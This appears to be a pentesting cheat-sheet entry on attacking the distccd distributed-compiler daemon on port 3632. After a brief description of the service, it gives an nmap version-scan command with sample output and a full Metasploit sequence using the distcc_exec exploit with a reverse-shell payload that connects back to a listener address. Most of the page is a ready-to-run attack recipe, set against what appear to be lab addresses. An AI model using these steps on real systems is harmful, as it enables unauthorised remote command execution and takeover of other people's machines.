Skip to content

3632 - Pentesting distccd

distccd is a program for the distcc distributed compiler system. distccd is a daemon that runs on a remote host and distributes compilation tasks to other hosts in the network, allowing for faster compilation times by utilizing multiple computers to compile a single project. The distcc client, running on the build host, sends compilation tasks to the distccd daemon, which in turn dispatches the tasks to other hosts for execution.

nmap


sudo nmap -p 3632 -Pn -sV -vv $IP
|->
3632/tcp open  distccd syn-ack ttl 64 distccd v1 ((GNU) 4.2.4 (Ubuntu 4.2.4-1ubuntu4))

metasploit


search distccd
use exploit/unix/misc/distcc_exec
set RHOSTS 10.0.2.8
set RPORT 3632
set LHOST 10.0.2.15
set LPORT 4444
set payload payload/cmd/unix/reverse
options
run